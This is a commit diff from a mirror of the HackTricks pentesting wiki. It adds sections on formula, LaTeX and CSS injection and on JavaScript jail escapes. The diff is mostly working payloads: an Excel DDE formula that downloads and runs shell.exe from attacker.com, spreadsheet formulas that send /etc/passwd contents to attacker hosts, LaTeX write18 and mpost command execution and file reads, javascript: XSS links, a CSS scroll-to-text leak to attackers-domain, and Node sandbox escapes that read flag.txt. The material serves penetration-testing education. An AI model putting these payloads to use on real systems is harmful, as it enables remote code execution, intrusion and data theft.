mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GitBook: [#3313] No subject
This commit is contained in:
parent
792413b4bf
commit
1a05533f33
5 changed files with 178 additions and 11 deletions
|
@ -458,7 +458,7 @@
|
||||||
* [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
|
* [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
|
||||||
* [File Upload](pentesting-web/file-upload/README.md)
|
* [File Upload](pentesting-web/file-upload/README.md)
|
||||||
* [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
|
* [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
|
||||||
* [Formula Injection](pentesting-web/formula-injection.md)
|
* [Formula/Doc/LaTeX Injection](pentesting-web/formula-doc-latex-injection.md)
|
||||||
* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling/README.md)
|
* [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling/README.md)
|
||||||
* [Request Smuggling in HTTP/2 Downgrades](pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md)
|
* [Request Smuggling in HTTP/2 Downgrades](pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md)
|
||||||
* [HTTP Response Smuggling / Desync](pentesting-web/http-response-smuggling-desync.md)
|
* [HTTP Response Smuggling / Desync](pentesting-web/http-response-smuggling-desync.md)
|
||||||
|
|
|
@ -1,6 +1,4 @@
|
||||||
# Formula Injection
|
# Formula/Doc/LaTeX Injection
|
||||||
|
|
||||||
## Formula Injection
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -18,7 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
## Info
|
## Formula Injection
|
||||||
|
|
||||||
|
### Info
|
||||||
|
|
||||||
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
|
If your **input** is being **reflected** inside **CSV file**s (or any other file that is probably going to be opened by **Excel**), you maybe able to put Excel **formulas** that will be **executed** when the user **opens the file** or when the user **clicks on some link** inside the excel sheet.
|
||||||
|
|
||||||
|
@ -26,7 +26,7 @@ If your **input** is being **reflected** inside **CSV file**s (or any other file
|
||||||
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
|
Nowadays **Excel will alert** (several times) the **user when something is loaded from outside the Excel** in order to prevent him to from malicious action. Therefore, special effort on Social Engineering must be applied to he final payload.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
## Hyperlink
|
### Hyperlink
|
||||||
|
|
||||||
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
|
**The following example is very useful to exfiltrate content from the final excel sheet and to perform requests to arbitrary locations. But it requires the use to click on the link (and accept the warning prompts).**
|
||||||
|
|
||||||
|
@ -49,7 +49,7 @@ The details of student in logged in the attackers web server.
|
||||||
|
|
||||||
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
|
![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)
|
||||||
|
|
||||||
## RCE
|
### RCE
|
||||||
|
|
||||||
For this example to work it's **needed to have enable the following configuration**:\
|
For this example to work it's **needed to have enable the following configuration**:\
|
||||||
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
|
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
|
||||||
|
@ -67,7 +67,7 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
|
||||||
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
|
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
|
||||||
```
|
```
|
||||||
|
|
||||||
## LFI
|
### LFI
|
||||||
|
|
||||||
**LibreOffice Calc**
|
**LibreOffice Calc**
|
||||||
|
|
||||||
|
@ -85,7 +85,7 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
|
||||||
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) – Concatenate the output from the file (after the above processing has taken place) with the FQDN (for which we have access to the host that is authoritative for the domain)
|
* CONCATENATE((SUBSTITUTE(MID((ENCODEURL(‘file:///etc/passwd’#$passwd.A19)),1,41),”%”,”-“)),”.\<FQDN>”) – Concatenate the output from the file (after the above processing has taken place) with the FQDN (for which we have access to the host that is authoritative for the domain)
|
||||||
* WEBSERVICE – Will make a request for this non-existent DNS name which we can then parse the logs (or run tcpdump etc.) on the DNS authoritative name server for which we have control
|
* WEBSERVICE – Will make a request for this non-existent DNS name which we can then parse the logs (or run tcpdump etc.) on the DNS authoritative name server for which we have control
|
||||||
|
|
||||||
## Google Sheets OOB Data Exfiltration
|
### Google Sheets OOB Data Exfiltration
|
||||||
|
|
||||||
Firstly, let’s introduce some of the more interesting functions.
|
Firstly, let’s introduce some of the more interesting functions.
|
||||||
|
|
||||||
|
@ -125,9 +125,106 @@ Firstly, let’s introduce some of the more interesting functions.
|
||||||
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
|
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## LaTeX Injection
|
||||||
|
|
||||||
|
Usually the servers that will find on the internet that **convert LaTeX code to PDF** use **`pdflatex`**.\
|
||||||
|
This program uses 3 main attributes to (dis)allow command execution:
|
||||||
|
|
||||||
|
* **`--no-shell-escape`**: **Disable** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
|
||||||
|
* **`--shell-restricted`**: Same as `--shell-escape`, but **limited** to a 'safe' set of **predefined** **commands (**On Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
|
||||||
|
* **`--shell-escape`**: **Enable** the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
|
||||||
|
|
||||||
|
However, there are other ways to execute commands, so to avoid RCE it's very important to use `--shell-restricted`.
|
||||||
|
|
||||||
|
### Read file <a href="#read-file" id="read-file"></a>
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\input{/etc/passwd}
|
||||||
|
\include{password} # load .tex file
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Read single lined file
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\newread\file
|
||||||
|
\openin\file=/etc/issue
|
||||||
|
\read\file to\line
|
||||||
|
\text{\line}
|
||||||
|
\closein\file
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Read multiple lined file
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\newread\file
|
||||||
|
\openin\file=/etc/passwd
|
||||||
|
\loop\unless\ifeof\file
|
||||||
|
\read\file to\fileline
|
||||||
|
\text{\fileline}
|
||||||
|
\repeat
|
||||||
|
\closein\file
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Read text file, keep the formatting
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\usepackage{verbatim}
|
||||||
|
\verbatiminput{/etc/passwd}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Write file <a href="#write-file" id="write-file"></a>
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ewwrite\outfile
|
||||||
|
\openout\outfile=cmd.tex
|
||||||
|
\write\outfile{Hello-world}
|
||||||
|
\closeout\outfile
|
||||||
|
```
|
||||||
|
|
||||||
|
### Command execution <a href="#command-execution" id="command-execution"></a>
|
||||||
|
|
||||||
|
The input of the command will be redirected to stdin, use a temp file to get it.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\immediate\write18{env > output}
|
||||||
|
\input{output}
|
||||||
|
|
||||||
|
\input{|"/bin/hostname"}
|
||||||
|
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
|
||||||
|
|
||||||
|
# allowed mpost command RCE
|
||||||
|
\documentclass{article}\begin{document}
|
||||||
|
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
|
||||||
|
\end{document}
|
||||||
|
```
|
||||||
|
|
||||||
|
If you get any LaTex error, consider using base64 to get the result without bad characters
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\immediate\write18{env | base64 > test.tex}
|
||||||
|
\input{text.tex}
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\input|ls|base4
|
||||||
|
\input{|"/bin/hostname"}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cross Site Scripting <a href="#cross-site-scripting" id="cross-site-scripting"></a>
|
||||||
|
|
||||||
|
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
\url{javascript:alert(1)}
|
||||||
|
\href{javascript:alert(1)}{placeholder}
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}
|
* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
|
||||||
|
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
|
||||||
|
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
|
||||||
|
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
|
@ -123,7 +123,7 @@ Functionalities that generates files including user input might execute unexpect
|
||||||
Users that open files uploaded by users or automatically generated including user input might be compromised.
|
Users that open files uploaded by users or automatically generated including user input might be compromised.
|
||||||
|
|
||||||
* [ ] [**File Upload**](file-upload/)
|
* [ ] [**File Upload**](file-upload/)
|
||||||
* [ ] [**Formula Injection**](formula-injection.md)
|
* [ ] [**Formula Injection**](formula-doc-latex-injection.md)
|
||||||
* [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
|
* [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
|
||||||
* [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
|
* [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
|
||||||
|
|
||||||
|
|
|
@ -127,6 +127,41 @@ Basically the main idea is to **use a custom font from an endpoint controlled by
|
||||||
</html>
|
</html>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Styling Scroll-to-Text Fragment
|
||||||
|
|
||||||
|
When a **URL fragment targets an element**, the [**`:target`**](https://drafts.csswg.org/selectors-4/#the-target-pseudo) pseudo-class **can be used** to select it, but **`::target-text` does not match anything**. It only matches text that is itself targeted by the \[fragment].
|
||||||
|
|
||||||
|
Therefore, an attacker could use the **Scroll-to-text** fragment and if **something is found** with that text we can **load a resource** from the attackers server to indicate it: 
|
||||||
|
|
||||||
|
```
|
||||||
|
:target::before { content : url(target.png) }
|
||||||
|
```
|
||||||
|
|
||||||
|
An example of this attack could be:
|
||||||
|
|
||||||
|
```
|
||||||
|
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
|
||||||
|
```
|
||||||
|
|
||||||
|
Which is sending the code:
|
||||||
|
|
||||||
|
```css
|
||||||
|
<style>:target::before { content : url(http://attackers-domain/?confirmed_existence_of_Administrator_username) }</style>
|
||||||
|
```
|
||||||
|
|
||||||
|
with the scroll-to-text fragment: `#:~:text=Administrator`
|
||||||
|
|
||||||
|
If the word Administrator is found, the indicated resource will be loaded.
|
||||||
|
|
||||||
|
There are three main mitigations:
|
||||||
|
|
||||||
|
1. **STTF can match only words or sentences on a web page**, theoretically making it impossible to leak random secrets or tokens (unless we break down the secret in one-letter paragraphs).
|
||||||
|
2. It is **restricted to top-level browsing contexts**, so it won’t work in an iframe, making the attack **visible to the victim**.
|
||||||
|
3. **User-activation gesture is needed for STTF to work**, so only navigations that are a result of user actions are exploitable, which greatly decreases the possibility to automate the attack without user interaction. However, there are certain conditions that the author of the above blog post discovered that facilitate the automation of the attack. Another, similar case, will be presented in PoC#3.
|
||||||
|
1. There are some **bypasses** for this like **social engineering**, or **forcing common browser extensions to interact**.
|
||||||
|
|
||||||
|
For more information check the original report: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
|
||||||
|
|
||||||
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
|
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
|
||||||
|
|
||||||
You can specify **external fonts for specific unicode values** that will only be **gathered if those unicode values are present** in the page. For example:
|
You can specify **external fonts for specific unicode values** that will only be **gathered if those unicode values are present** in the page. For example:
|
||||||
|
|
|
@ -778,6 +778,41 @@ Past known protocols: `mailto://`, `//x:1/`, `ws://`, `wss://`, _empty Location
|
||||||
|
|
||||||
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
|
If you are able to indicate the **callback** that javascript is going to **execute** limited to those chars. [**Read this section of this post**](./#javascript-function) to find how to abuse this behaviour.
|
||||||
|
|
||||||
|
### XS Jails
|
||||||
|
|
||||||
|
If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
// eval + unescape + regex
|
||||||
|
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
|
||||||
|
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
|
||||||
|
|
||||||
|
// use of with
|
||||||
|
with(console)log(123)
|
||||||
|
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
|
||||||
|
// Just replace console.log(1) to the real code, the code we want to run is:
|
||||||
|
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
|
||||||
|
|
||||||
|
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
|
||||||
|
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
|
||||||
|
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
|
||||||
|
|
||||||
|
//Final solution
|
||||||
|
with(
|
||||||
|
/with(String)
|
||||||
|
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
|
||||||
|
with(mainModule)
|
||||||
|
with(require(k))
|
||||||
|
return(String(readFileSync(n)))
|
||||||
|
/)
|
||||||
|
with(this)
|
||||||
|
with(constructor)
|
||||||
|
constructor(source)()
|
||||||
|
|
||||||
|
// For more uses of with go to challenge misc/CaaSio PSE in
|
||||||
|
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
|
||||||
|
```
|
||||||
|
|
||||||
### Obfuscation & Advanced Bypass
|
### Obfuscation & Advanced Bypass
|
||||||
|
|
||||||
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
|
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
|
||||||
|
|
Loading…
Reference in a new issue